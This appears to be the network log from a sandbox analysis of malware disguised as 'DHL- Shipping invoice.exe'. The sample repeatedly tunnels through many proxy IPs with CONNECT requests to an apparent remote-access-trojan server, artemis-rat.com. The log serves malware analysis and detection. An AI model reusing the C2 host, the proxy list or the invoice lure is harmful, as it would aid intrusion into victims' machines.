                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453027964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453803062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508255005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.540375948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            866192.168.2.452674175.183.82.221806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.357713938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            867192.168.2.452729202.162.219.1010806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.358378887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            868192.168.2.452783192.111.134.1041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.358794928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            869192.168.2.45234647.91.65.2331286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.365793943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.749965906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.344815969 CET38INHTTP/1.1 200 OK
                            content-length: 0
                            Mar 12, 2024 08:37:08.277734041 CET38INHTTP/1.1 200 OK
                            content-length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            870192.168.2.452731121.204.179.7077776484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.366923094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            871192.168.2.452741175.183.82.22181976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.406366110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            872192.168.2.450419192.169.244.80495886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.409790993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562401056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563572884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.562755108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.562635899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.562266111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.562274933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.656029940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.749813080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            873192.168.2.45279072.195.34.5841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.410162926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            874192.168.2.451809113.208.119.14290026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.410164118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562530041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.060635090 CET311INHTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Tue, 12 Mar 2024 07:37:06 GMT
                            Content-Type: text/html
                            Content-Length: 166
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            875192.168.2.452750148.72.209.17447346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.410574913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.232104063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343940020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.472340107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750185966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.047029018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:19.453413010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:27.952919960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.955445051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            876192.168.2.452748117.5.22.6753076484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.414902925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            877192.168.2.452781102.132.54.3480806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.416671038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            878192.168.2.450378162.214.225.223550296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.426194906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            879192.168.2.452784211.222.252.18781936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.428559065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            880192.168.2.45120495.111.237.46457386484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.429920912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            881192.168.2.45272591.107.180.250806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.430016994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.343729019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            882192.168.2.45279272.195.34.60273916484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.430519104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            883192.168.2.45041738.56.23.339996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.432338953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453223944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            884192.168.2.452025188.164.196.31494266484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.441009998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.453283072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.453844070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508256912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.540376902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:38.546670914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:50.553489923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:14.562273026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:02.624814034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            885192.168.2.45208192.204.134.3877856484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.476547003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562575102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            886192.168.2.452811104.16.195.74806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.501693010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.590049982 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            887192.168.2.452549117.160.250.134806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.503401041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.087331057 CET303INHTTP/1.1 400 Bad Request
                            Server: openresty
                            Date: Tue, 12 Mar 2024 07:37:02 GMT
                            Content-Type: text/html
                            Content-Length: 154
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            888192.168.2.45017641.77.188.131806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:02.507575035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.590003014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.683988094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750127077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.749977112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:28.864897966 CET536INHTTP/1.1 500 Internal Server Error
                            Date: Tue, 12 Mar 2024 07:37:28 GMT
                            Server: Apache
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                            X-Content-Type-Options: nosniff
                            Content-Length: 597
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
